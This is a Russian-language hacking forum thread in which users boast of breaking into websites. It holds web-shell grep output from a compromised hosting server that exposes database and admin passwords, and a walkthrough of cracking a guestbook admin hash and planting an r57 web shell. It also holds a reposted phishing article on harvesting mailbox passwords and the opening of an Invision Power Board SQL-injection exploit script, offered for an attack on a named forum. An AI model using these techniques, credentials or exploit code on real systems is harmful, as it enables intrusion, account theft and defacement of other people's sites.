[ znakomstva.dump.ru ] drwxr-xr-x maxwal maxwal create link
[ zona13.dump.ru ] drwxr-xr-x alexpod1366 862 create link
[ zpz.dump.ru ] drwxr-xr-x zpz zpz create link

Enable treeview 

Да вот так свезло. Трогать чужие сайты не стал а пошол выше. Хотел сделать дефейс на главной странице всего сервера(они оказывали услуги хостинга) подумал, плдумал а ну его к черту. Ведь работал я без прокси...
Вместо этого провел поиск по тому обреченному сайту
   /free/sites/portal.dump.ru//new/index.php
50   /* Login Authorization using COOKIES */
57   if(check_login($username, $cmd5_password))
69   /* END Login Authorization using COOKIES */
73   /* Login Authorization using SESSIONS */
79   if($action == "dologin")
82   if(check_login($username, $md5_password)){
98   if(check_login($_SESSION['username'], $_SESSION['md5_password'])){
108   /* END Login Authorization using SESSIONS */
117   // If User is Not Logged In, Display The Login Page
   /free/sites/portal.dump.ru//new/inc/functions.inc.php
27   // Function: check_login
28   // Description: Check login information
30   function check_login($username, $md5_password){
   /free/sites/portal.dump.ru//new/inc/install.mdu
180   You can now go to CuteNews login page.
   /free/sites/portal.dump.ru//new/inc/main.mdu
3   if($member_db[1] == 4 and $action == "dologin"){ header("Location: $config_http_script_dir/index.php?mod=options&action=personal"); exit; }
   /free/sites/portal.dump.ru//forum/admin_groups.php
105   Allow users in this group to view the board. This setting applies to every aspect of the board and can therefore not be overridden by forum specific settings. If this is set to "No", users in this group will only be able to login/logout and register.
   /free/sites/portal.dump.ru//forum/admin_options.php
674   When enabled, the board will only be available to administrators. This should be used if the board needs to taken down temporarily for maintenance. WARNING! Do not log out when the board is in maintenance mode. You will not be able to login again.
   /free/sites/portal.dump.ru//forum/login.php
33   // Load the login.php language file
34   require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';
69   message($lang_login['Wrong user/pass'].' '.$lang_login['Forgotten pass'].'');
81   redirect($_POST['redirect_url'], $lang_login['Login redirect']);
102   redirect('index.php', $lang_login['Logout redirect']);
153   message($lang_login['Forget mail'].' '.$pun_config['o_admin_email'].'.');
156   message($lang_login['No e-mail match'].' '.$email.'.');
160   $page_title = pun_htmlspecialchars($pun_config['o_board_title']).' / '.$lang_login['Request pass'];
193   // Try to determine if the data in HTTP_REFERER is valid (if not, we redirect to index.php after login)
196   $page_title = pun_htmlspecialchars($pun_config['o_board_title']).' / '.$lang_common['Login'];
198   $focus_element = array('login', 'req_username');
   /free/sites/portal.dump.ru//forum/register.php
229   $mail_message = str_replace('', $pun_config['o_base_url'].'/login.php', $mail_message);
   /free/sites/portal.dump.ru//forum/include/email.php
145   fwrite($socket, 'AUTH LOGIN'."\r\n");
   /free/sites/portal.dump.ru//forum/include/functions.php
138   // Enable sending of a P3P header by removing // from the following line (try this if login is failing in IE6)
247   $links[] = ''.$lang_common['Login'].'';
   /free/sites/portal.dump.ru//forum/lang/English/common.php
119   'Login' => 'Зайти',
   /free/sites/portal.dump.ru//forum/lang/English/login.php
4   $lang_login = array(
9   'Login redirect' => 'Успешный вход. Переадресация...',
16   'Login legend' => 'Введите ваше имя и пароль ниже',
17   'Login info' => 'Если вы не зарегистрированны или забыли свой пароль нажмите на соответствующую ссылку ниже.',
   /free/sites/portal.dump.ru//meeting/foto.php
18   $login = @$db[$i][0];
   /free/sites/portal.dump.ru//meeting/index.php
40   if(@$send && @$_POST['login'] && @$_POST['pass'] && @$_POST['name'] && @$_POST['pass'] && @$_POST['born_day'] && @$_POST['born_month'] && @$_POST['born_year']){
46   if($db[$i][0]==$login){
54   print form($login,"",$pol,$name,$born_day,$born_month,($born_year+15),$city,$growth,$weight,$mail,$url,$icq,$about);
79   $db[$i][0]=$login;
108   $loginform="
116   if(@$_POST['login'] && @$_POST['pass']){
118   if(notlogin($login,$pass)){
119   print notlogin($login,$pass);
120   print $loginform;
126   if($db[$i][0]==$login){
176   $db[$i][0]=$login;
205   print $loginform;
212   if(@$login){
216   if($db[$i][0]==$login){
   /free/sites/portal.dump.ru//meeting/lib.php
133   function notlogin($login,$pass){
136   $login=stripslashes($login);
142   if($db[$i][0]==$login){
242   function form($s_login="",$s_pass="",$s_pol="",$s_name="",$s_day="",$s_month="",$s_year="",$s_city="",$s_growth="",$s_weight="",$s_mail="",$s_url="",$s_icq="",$s_about="",$s_foto=""){
   /free/sites/portal.dump.ru//meeting/foto/2fb292a3761e824370eb72c891f46be8.php
47   // Логин и пароль для доступа к скрипту (Login & Password for access)
49   $name='r57'; // логин пользователя (user login)
765   'eng_text37'=>'Login',
833   'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
835   'eng_text101'=>'Use reverse (user -> resu) login for password',
1040   $text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server');
1733   if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }
1866   if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
1867   else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
2180   echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2189   echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
   /free/sites/portal.dump.ru//top/inc/admin.php
3   function login($currentPassword)
26   $loginUser = login($password);
27   if(!$loginUser)
   /free/sites/portal.dump.ru//chat2/vars.php
22   $login_color="#000066";
   /free/sites/portal.dump.ru//rass/admin.php
7   function login() {
32   login();
   /free/sites/portal.dump.ru//poll/admin.php
4   function login() {
30   login();

[ BACK ]

   /free/sites/portal.dump.ru//new/index.php
32   setcookie("md5_password","");
54   if(!isset($HTTP_COOKIE_VARS["md5_password"])) { $cmd5_password = md5($password); }
55   else { $cmd5_password = $HTTP_COOKIE_VARS["md5_password"]; }
57   if(check_login($username, $cmd5_password))
62   setcookie("md5_password", $cmd5_password);
81   $md5_password = md5($password);
82   if(check_login($username, $md5_password)){
86   @session_register('md5_password');
90   $_SESSION['md5_password'] = "$md5_password";
97   }elseif(isset($_SESSION['username'])){ // Check the if member is using valid username/password
98   if(check_login($_SESSION['username'], $_SESSION['md5_password'])){
125   setcookie("password","");
126   setcookie("md5_password","");
   /free/sites/portal.dump.ru//new/news.txt
31   1134399181|revnost|Accent Office Password Recovery 2.32 |Accent Office Password Recovery - Совместила в себе возможности сразу трёх программ, представленных на этом сайте. С её помощью Вы сможете восстановить пароли для Microsoft® Access, Microsoft® Excel и Microsoft® Word версий 6.0/95/97/2000/XP. Программа снабжена простым, интуитивно понятным грфическим интерфейсом на русском языке и системой контекстной подсказки, которая будет комментировать работу программы и направлять Ваши действия. Кроме того, детальное, пошаговое описание всех операций Вы сможете найти в разделе «Быстрый Старт»СКАЧАТЬ|||6||
   /free/sites/portal.dump.ru//new/inc/editusers.mdu
164   if(!$regpassword){ msg("error","Ошибка !!!", "Заполните поле 'Пароль' !", "javascript:history.go(-1)"); }
175   $regpassword = md5($regpassword);
180   fwrite($new_users_file, "$add_time|$reglevel|$regusername|$regpassword|$regnickname|$regemail|0|0||\n");
295   if($editpassword != ""){
296   $old_db_arr[3] = md5($editpassword);
297   if($old_db_arr[2] == $username){setcookie("md5_password", $old_db_arr[3]); }
   /free/sites/portal.dump.ru//new/inc/functions.inc.php
30   function check_login($username, $md5_password){
39   if(strtolower($member_db[2]) == strtolower($username) && $member_db[3] == $md5_password)
   /free/sites/portal.dump.ru//new/inc/install.mdu
69    Password:
71    please do NOT loose your password
75    Retype Password:
106   if(!$reg_username or !$reg_password1 or !$url or $reg_password1 != $reg_password2 ){ die("Error !!! You didn't fill some required field or the passwords did not match"); }
107   $reg_password = md5($reg_password1);
114   fwrite($users_file, time()."|1|$reg_username|$reg_password|$reg_nickname|$reg_email|0|0||\n");
   /free/sites/portal.dump.ru//new/inc/options.mdu
159   if($editpassword != ""){
160   $old_user_db_arr[3] = md5($editpassword);
161   if($config_use_cookies == TRUE){ setcookie("md5_password", $old_user_db_arr[3]); }
162   $_SESSION['md5_password'] = $old_user_db_arr[3];
   /free/sites/portal.dump.ru//new/inc/shows.inc.php
33   $my_passwords[$user_arr[2]] = $user_arr[3];
82   if((strtolower($user_arr[2]) == strtolower($name) or strtolower($user_arr[4]) == strtolower($name)) and $user_arr[3] != md5($password) and $name != "")
88   echo"This name is owned by a registered user and you must enter password to use it
89   Password: 
   /free/sites/portal.dump.ru//forum/admin_options.php
595   SMTP password
598   Password for SMTP server. Only enter a password if it is required by the SMTP server (most servers do not require authentication).
621   When enabled, users are e-mailed a random password when they register. They can then log in and change the password in their profile if they see fit. This feature also requires users to verify new e-mail addresses if they choose to change from the one they registered with. This is an effective way of avoiding registration abuse and making sure that all users have "correct" e-mail addresses in their profiles.
   /free/sites/portal.dump.ru//forum/admin_permissions.php
188   Change user passwords
191   Allow moderators to change user passwords. Other moderators and administrators are excluded.
   /free/sites/portal.dump.ru//forum/header.php
97   if (elem.type && (elem.type=="text" || elem.type=="textarea" || elem.type=="password" || elem.type=="file") && elem.value=='')
   /free/sites/portal.dump.ru//forum/config.php
7   $db_password = 'jekjek';
   /free/sites/portal.dump.ru//forum/login.php
41   $form_password = trim($_POST['req_password']);
45   $result = $db->query('SELECT id, group_id, password, save_pass FROM '.$db->prefix.'users WHERE '.$username_sql) or error('Unable to fetch user info', __FILE__, __LINE__, $db->error());
46   list($user_id, $group_id, $db_password_hash, $save_pass) = $db->fetch_row($result);
50   if (!empty($db_password_hash))
52   $sha1_in_db = (strlen($db_password_hash) == 40) ? true : false;
55   $form_password_hash = pun_hash($form_password); // This could result in either an SHA-1 or an MD5 hash (depends on $sha1_available)
57   if ($sha1_in_db && $sha1_available && $db_password_hash == $form_password_hash)
59   else if (!$sha1_in_db && $db_password_hash == md5($form_password))
64   $db->query('UPDATE '.$db->prefix.'users SET password=\''.$form_password_hash.'\' WHERE id='.$user_id) or error('Unable to update user password', __FILE__, __LINE__, $db->error());
79   pun_setcookie($user_id, $form_password_hash, $expire);
124   // Load the "activate password" template
125   $mail_tpl = trim(file_get_contents(PUN_ROOT.'lang/'.$pun_user['language'].'/mail_templates/activate_password.tpl'));
139   // Generate a new password and a new password activation code
140   $new_password = random_pass(8);
141   $new_password_key = random_pass(8);
143   $db->query('UPDATE '.$db->prefix.'users SET activate_string=\''.pun_hash($new_password).'\', activate_key=\''.$new_password_key.'\' WHERE id='.$cur_hit['id']) or error('Unable to update activation data', __FILE__, __LINE__, $db->error());
147   $cur_mail_message = str_replace('', $pun_config['o_base_url'].'/profile.php?id='.$cur_hit['id'].'&action=change_pass&key='.$new_password_key, $cur_mail_message);
148   $cur_mail_message = str_replace('', $new_password, $cur_mail_message);
197   $required_fields = array('req_username' => $lang_common['Username'], 'req_password' => $lang_common['Password']);
   /free/sites/portal.dump.ru//forum/profile.php
59   $result = $db->query('SELECT activate_string, activate_key FROM '.$db->prefix.'users WHERE id='.$id) or error('Unable to fetch new password', __FILE__, __LINE__, $db->error());
60   list($new_password_hash, $new_password_key) = $db->fetch_row($result);
62   if ($key == '' || $key != $new_password_key)
66   $db->query('UPDATE '.$db->prefix.'users SET password=\''.$new_password_hash.'\', activate_string=NULL, activate_key=NULL WHERE id='.$id) or error('Unable to update password', __FILE__, __LINE__, $db->error());
72   // Make sure we are allowed to change this users password
75   if ($pun_user['g_id'] > PUN_MOD) // A regular user trying to change another users password?
77   else if ($pun_user['g_id'] == PUN_MOD) // A moderator trying to change a users password?
83   if ($pun_config['p_mod_edit_users'] == '0' || $pun_config['p_mod_change_passwords'] == '0' || $db->result($result) < PUN_GUEST)
90   $old_password = isset($_POST['req_old_password']) ? trim($_POST['req_old_password']) : '';
91   $new_password1 = trim($_POST['req_new_password1']);
92   $new_password2 = trim($_POST['req_new_password2']);
94   if ($new_password1 != $new_password2)
96   if (strlen($new_password1) < 4)
99   $result = $db->query('SELECT password, save_pass FROM '.$db->prefix.'users WHERE id='.$id) or error('Unable to fetch password', __FILE__, __LINE__, $db->error());
100   list($db_password_hash, $save_pass) = $db->fetch_row($result);
104   if (!empty($db_password_hash))
106   $sha1_in_db = (strlen($db_password_hash) == 40) ? true : false;
109   $old_password_hash = pun_hash($old_password); // This could result in either an SHA-1 or an MD5 hash
111   if (($sha1_in_db && $sha1_available && $db_password_hash == $old_password_hash) ||
112   (!$sha1_in_db && $db_password_hash == md5($old_password)) ||
120   $new_password_hash = pun_hash($new_password1);
122   $db->query('UPDATE '.$db->prefix.'users SET password=\''.$new_password_hash.'\' WHERE id='.$id) or error('Unable to update password', __FILE__, __LINE__, $db->error());
127   pun_setcookie($pun_user['id'], $new_password_hash, $expire);
134   $required_fields = array('req_old_password' => $lang_profile['Old pass'], 'req_new_password1' => $lang_profile['New pass'], 'req_new_password2' => $lang_profile['Confirm new pass']);
135   $focus_element = array('change_pass', (($pun_user['g_id'] > PUN_MOD) ? 'req_old_password' : 'req_new_password1'));
813   $result = $db->query('SELECT password FROM '.$db->prefix.'users WHERE id='.$id) or error('Unable to fetch user password hash', __FILE__, __LINE__, $db->error());
   /free/sites/portal.dump.ru//forum/register.php
89   $password1 = random_pass(8);
90   $password2 = $password1;
94   $password1 = trim($_POST['req_password1']);
95   $password2 = trim($_POST['req_password2']);
101   // Validate username and passwords
106   else if (strlen($password1) < 4)
108   else if ($password1 != $password2)
180   $password_hash = pun_hash($password1);
183   $db->query('INSERT INTO '.$db->prefix.'users (username, group_id, password, email, email_setting, save_pass, timezone, language, style, registered, registration_ip, last_visit) VALUES(\''.$db->escape($username).'\', '.$intial_group_id.', \''.$password_hash.'\', \''.$email1.'\', '.$email_setting.', '.$save_pass.', '.$timezone.' , \''.$db->escape($language).'\', \''.$pun_config['o_default_style'].'\', '.$now.', \''.get_remote_address().'\', '.$now.')') or error('Unable to create user', __FILE__, __LINE__, $db->error());
228   $mail_message = str_replace('', $password1, $mail_message);
237   pun_setcookie($new_uid, $password_hash, ($save_pass != '0') ? $now + 31536000 : 0);
244   $required_fields = array('req_username' => $lang_common['Username'], 'req_password1' => $lang_common['Password'], 'req_password2' => $lang_prof_reg['Confirm pass'], 'req_email1' => $lang_common['E-mail'], 'req_email2' => $lang_common['E-mail'].' 2');
   /free/sites/portal.dump.ru//forum/cache/cache_config.php
64   'p_mod_change_passwords' => '0',
   /free/sites/portal.dump.ru//forum/include/functions.php
36   $cookie = array('user_id' => 1, 'password_hash' => 'Guest');
38   // If a cookie is set, we get the user_id and password hash from it
40   list($cookie['user_id'], $cookie['password_hash']) = @unserialize($_COOKIE[$cookie_name]);
44   // Check if there's a user with the user ID and password hash from the cookie
49   if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) !== $cookie['password_hash'])
134   function pun_setcookie($user_id, $password_hash, $expire)
141   setcookie($cookie_name, serialize(array($user_id, md5($cookie_seed.$password_hash))), $expire, $cookie_path, $cookie_domain, $cookie_secure);
644   // Generate a random password of length $len
650   $password = '';
652   $password .= substr($chars, (mt_rand() % strlen($chars)), 1);
654   return $password;
   /free/sites/portal.dump.ru//forum/include/dblayer/common_db.php
70   $db = new DBLayer($db_host, $db_username, $db_password, $db_name, $db_prefix, $p_connect);
   /free/sites/portal.dump.ru//forum/include/dblayer/mysql.php
41   function DBLayer($db_host, $db_username, $db_password, $db_name, $db_prefix, $p_connect)
46   $this->link_id = @mysql_pconnect($db_host, $db_username, $db_password);
48   $this->link_id = @mysql_connect($db_host, $db_username, $db_password);
   /free/sites/portal.dump.ru//forum/include/dblayer/mysqli.php
41   function DBLayer($db_host, $db_username, $db_password, $db_name, $db_prefix, $foo)
50   $this->link_id = @mysqli_connect($db_host, $db_username, $db_password, $db_name, $db_port);
52   $this->link_id = @mysqli_connect($db_host, $db_username, $db_password, $db_name);
   /free/sites/portal.dump.ru//forum/include/dblayer/pgsql.php
46   function DBLayer($db_host, $db_username, $db_password, $db_name, $db_prefix, $p_connect)
70   if ($db_password != '')
71   $connect_str[] = 'password='.$db_password;
   /free/sites/portal.dump.ru//forum/include/dblayer/sqlite.php
45   function DBLayer($db_host, $db_username, $db_password, $db_name, $db_prefix, $p_connect)
   /free/sites/portal.dump.ru//forum/lang/English/common.php
73   'Password' => 'Пароль',
   /free/sites/portal.dump.ru//forum/lang/English/login.php
19   // Forget password mail stuff
   /free/sites/portal.dump.ru//forum/lang/English/profile.php
25   // Password stuff
   /free/sites/portal.dump.ru//meeting/foto/2fb292a3761e824370eb72c891f46be8.php
47   // Логин и пароль для доступа к скрипту (Login & Password for access)
50   $pass='r57'; // пароль пользователя (user password)
410   $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
734   'eng_text11'=>'Password for access',
766   'eng_text38'=>'Password',
833   'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
835   'eng_text101'=>'Use reverse (user -> resu) login for password',
1733   if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }
1942   $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
2032   $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
2144   echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
2151   echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
2181   echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2190   echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2239   echo sr(45,"".$lang[$language.'_text38'].$arrow."",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2248   echo sr(45,"".$lang[$language.'_text38'].$arrow."",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2259   echo sr(45,"".$lang[$language.'_text38'].$arrow."",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
   /free/sites/portal.dump.ru//top/inc/admin.php
3   function login($currentPassword)
5   global $password;
6   session_register("password");
7   $password = $currentPassword;
8   if($password == PASSWORD) return true;
11   session_unregister("password");
16   function checkPermissions($currentPassword)
18   if($currentPassword != PASSWORD)
25   if (!isset($password)) $password = "";
26   $loginUser = login($password);
   /free/sites/portal.dump.ru//top/inc/data.php
4   define("PASSWORD", "331331"); // пароль доступа к администрированию
   /free/sites/portal.dump.ru//rass/admin.php
8   global $_POST, $password, $username;
9   if(isset($_POST['pass']) && isset($_POST['tname']) && $_POST['pass']==$password && $_POST['tname']==$username) {
14   } else if(isset($_POST['pass']) and $_POST['pass']!=$password or isset($_POST['tname'])) $err='Неверные данные!';
   /free/sites/portal.dump.ru//rass/update.php
9   if ($_SERVER['PHP_AUTH_USER']==$username && $_SERVER['PHP_AUTH_PW']==$password) {
   /free/sites/portal.dump.ru//rass/config.inc.php
11   $password="332";?>
   /free/sites/portal.dump.ru//poll/admin.php
5   global $_POST, $password, $username;
6   if(isset($_POST['pass']) && isset($_POST['tname']) && $_POST['pass']==$password && $_POST['tname']==$username) {
   /free/sites/portal.dump.ru//poll/polls/pollconfig.inc.php
4   $password="2"; // пароль админа

[ BACK ]

5

Чувак!!! Не удивляйся если в один прекрасный летний день к тебе завалятся дяденьки в черных костюмах с надписями ФСБ!

6

А я инфу на винте не храню. Пользуюсь snooper - ом (все хранится в озу) так что все улики после перезагрузки уходят в небытие...

7

<!!!PILOT!!!> написал(а):

Чувак!!! Не удивляйся если в один прекрасный летний день к тебе завалятся дяденьки в черных костюмах с надписями ФСБ!

Ничё ему за это не будет. Проверено. Вот если он хакнет банковский сервак.... или говерментовский... тогда могут быть напряги. :)

8

Алла бирсэ ансында матурлап эшлэрбез. Тулька приксик белэн...
Анары ботенебез бергэ бер ай эщэрбез

9

Сижу вот я сегодня ночью и думаю: эх хакнуть бы чо нить да по быстрому.
Тут руки сами по себенабрали в wwwwoweb.ru(ну люблю я этот сайт, ну хоть убейте)
Смотрю на разделы

Чат
Счетчики
знакомства
Гостевые кнниги

хм... интересно а давайка я гостевые позыркаю.
Взгляд падает на один из скриптов
Скачиваю, изучаю. Вроде все нормально.
Заряжаю его на свой апачь. Как любезно скрипт нас просит ввести логин и пароль администратора. Затем говорит запомните а то больше не сможете зайти в раздел админа.
Окей.
Захожу в админку. Да кто постарался ... Все довольно таки прилично. Но главное есть возможность редактировать верхнюю и нижнюю часть индексевой странице.(на самом деле мы редактируем файлы header.inc.php и еще какойто, верхняя и нижняя часть страницы соответственно а по середине са ма гостевая. Эти части вызываются с include). Ну чтож...получив адин права мы и хакнем сайт.
Но как это сделать.
Зашол в директорию сайта и заметил новый файл(до установки скрипта и ввода логина ипароля администратора его небыло)
открываю в блакноте и что я вижу:
в файле прописан логин без изменений и пасс в md5. ну думаю вот она потенциальная уязвимость.
Если найду админа не поставившего правильно права на этот файл я смогу получить доступ ко всему сайту
Захожу на яндекс и пишу copyright Sad Raven. Ну что я могу сказать. Это человек довольно таки известен в сети.
немного попрыгав по сайтам мне надоело натыкатся на ДОСТУП ЗАКРЫТ.
От злости прыгнул на последнии страницы и вот на одном сайте набрав /passwd.dat получил вопрос системы
Сохранить или открыть файл
Сохранить, а как же ещё. Приведя фай в божеский вид для брутфорса паролей в md5inside запустил процес.(а почему брутфорс спросят некоторые, а потому что МД5 никак не расшифруешь. Можно только брут форсом.) Проль не стал долгл сопротивлятся а уже через 2-3 часа сдался. Ну скажем так нормально. На некоторые пароли уходит по несколько недель(например один мой хороший друг EdkiyG1uk получив хеш администратора форума моего университета в течении 4 недель не вырубал комп).
Итак м ыпрыгаем на сайт, набираем админ.пхп , вводим пароль и вот мы в админке.
Редактирую файл хедер, вместо его кода сохраняю код r57shell но скрипт дает сбой. Ладно попробуем nr.php, а вот он заработал.
Зная где находиться этот файл запускаю и работаю.

10

Да, кстати, как закончилась та история, когда ты собирался учавствовать в конкурсе журнала хакер?  Отправлял им эту уязвимость?

11

это  явно  не  для  блондинок....

12

Fare115
И не для рыжих!

13

Ну вот , всю тему свели на нет
Тут же написано ВЗЛОМЫ И ТП

14

Они постоянно так делают!(((

15

Why yo do this allways?

16

stud_gizmo
you speak to english??

17

fare115 !!! I now, you don't now english. Because when you say about my english, you say: "you speak english?".
This is not correctli...

Do you speak english - this is correct

18

You are right stud_gizmo:Do you speak english - this is correct.
stud_gizmo

19

Фаренынъ переводчиге иске. Беренче промт ахры. :)
s-g: now  тугель - know. :)

20

Хужа_Н написал(а):

Фаренынъ переводчиге иске. Беренче промт ахры. 
s-g: now  тугель - know.

Да
приколы у тебя ЗБ. Честно
Ну все говорим тока оХАКЕ

вот вам отличная статья о взломе мыла

      Взлом e-mail

     Итак  сегодня  я  расскажу  об одном из методов заполучения чужих почтовых ящиков, а заодно и дам некоторые
     пояснения  насчет  проведенной недавно акции-провокации на хакер.ру. Забудьте про тупой брутфорс или взломы
     серверов...эти пути слишком долгие, мы будем использовать такую замечательную вещь как социальная инженерия
     (а по простому наёбка). Весь рассказ я построю на описании проведенной недавно на хакер.ру этакой маленькой
     провокации.
     Если  вы  часто  заглядываете  на  форумы  этого сайта, то вы могли увидеть там сообщение о взломе почты на
     Рамблере. Для тех кто проспал даю полный текст сообщения:

     [ start message ]
     
     Взлом  почты  на Рамблер.ру. Всё очень просто. По адресу passwd_repair@rambler.ru сидит mail-робот, который
     анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу
     шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со
     специальным  Subject'ом.  Фишка  в  том,  что если в сабжект впихнуть не один, а два запроса, то проверятся
     будет  последний  ящик,  а информация будет выслана для второго! Так шевелим мозгами... Правильно! Высылаем
     два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем ;) )

     Итак, мы хотим обломать vasya_pupkin@rambler.ru
     Наш ящик hacker@rambler.ru пароль qwerty
     Пишем письмо роботу на passwd_repair@rambler.ru
     Subject: login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=

     Т.е. первый раз вставляем в тему письма запрос о ящике-жертве: login=vasya_pupkin&pass=&answer=
     А  потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они
     правильные!
     login=hacker&pass=qwerty&answer=
     Итого: тема сообщения выглядит вот так :
     login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=
     Все,  ждите  пасс  на  ваше мыло!!! (Answer = ответ на секретный вопрос, но прокатывает и без него, запросы
     разделяются точкой с запятой. Удачи кул хацкеры)
     
     [ end message ]

     Итак  для  тех  кто  непонял, обьясняю. Ящик passwd_repair@rambler.ru конечно существует, более того он был
     зарегестрирован  мною  за  день  до  помещения  данной  месаги.  8) Вот так. Таким образом все кул хацкеры,
     решившие  поиметь  пароль  от  почтового  ящика  друга  Васи, посылали мне на ящик письма с темой в которой
     светили  пароли  от  своей почты... хех тут всё просто как компутер. Вот таким нехитрым способом за 3 дня я
     поимел  пароли  от  37  почтовых  ящиков  в зоне рамблера. Особенно сильно прикалывали юзеры посылающие мне
     письма с помощью анонимных мейлеров... какой в этом смысл я так и не понял... если ты в поле темы посылаешь
     свой логин и пароль, то никакой анонимный мэйлер тебя уже не спасет.
     По  количеству  человек  повёвшихся на эту нехитрую наёбку можно в принципе судить о уровне людей сидящих в
     форумах  на  хакер.ру.  Нихрена  не понимающие челы, ждущие что придет добрый дядя и даст им пароли от всех
     серваков мира, кидающиеся всей толпой на описание ламерского взлома. И проигрывающие..... 8(

     Автор: 1dt.w0lf
     ---------------------------------------
     RusH security team - http://rst.void.ru

21

Типа фиша. Прикольно. Надоб попробовать где-нить.

22

Stud,  а сможешь найти уязвимость движка типа http://www.bashforum.net/forums/
Тапсанъ язырсынъ эле. А то шундагы щущкалар татарлар турында эллэ нимэ язалар.

23

Блэт курсэтэм мин аларга, бэтэклэрен жырткалайм

24

короче они юзают ipb 2.0.4 а она дырявая

Пожалуйста вот вам эксплоит

#!/usr/bin/perl
use IO::Socket;

          #    #        #    #                                                                                                                                                                                                                                                                                                                                   
          #   #          #   #                                                                                                                                                                                                                                                                                                                                   
         #    #          #    #                                                                                                                                                                                                                                                                                                                                   
         #   ##   ####   ##   #                                                                                                                                                                                                                                                                                                                                   
        ##   ##  ######  ##   ##                                                                                                                                                                                                                                                                                                                                 
        ##   ##  ######  ##   ##                                                                                                                                                                                                                                                                                                                                 
        ##   ##   ####   ##   ##                                                                                                                                                                                                                                                                                                                                 
        ###   ############   ###                                                                                                                                                                                                                                                                                                                                 
        ########################                                                                                                                                                                                                                                                                                                                                 
             ##############                                                                                                                                                                                                                                                                                                                                       
      ######## ########## #######                                                                                                                                                                                                                                                                                                                                 
    ###   ##  ##########  ##   ###                                                                                                                                                                                                                                                                                                                               
    ###   ##  ##########  ##   ###                                                                                                                                                                                                                                                                                                                               
      ###   #  ##########  #   ###                                                                                                                                                                                                                                                                                                                               
      ###   ##  ########  ##   ###                                                                                                                                                                                                                                                                                                                               
       ##    #   ######   #    ##                                                                                                                                                                                                                                                                                                                                 
        ##   #    ####   #    ##                                                                                                                                                                                                                                                                                                                                 
         ##                 ##           

## Invision Power Board v2.0.0 - 2.0.2 sql injection exploit
## by RusH security team (wwwrst.void.ru)
## coded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example:
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>]    DIR: /IPB202/
## [>]  FORUM: 2
## [>]  TOPIC: 1
## [>]    SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX:
## [>]     ID:
## ------------------------------------------------------------------------------------------------
##
## [~] PREPARE TO CONNECT...
## [+] CONNECTED
## [~] SENDING QUERY...
## [+] DONE!
##
## PREFIX: ibf_
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3 ibf_
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>]    DIR: /IPB202/
## [>]  FORUM: 2
## [>]  TOPIC: 1
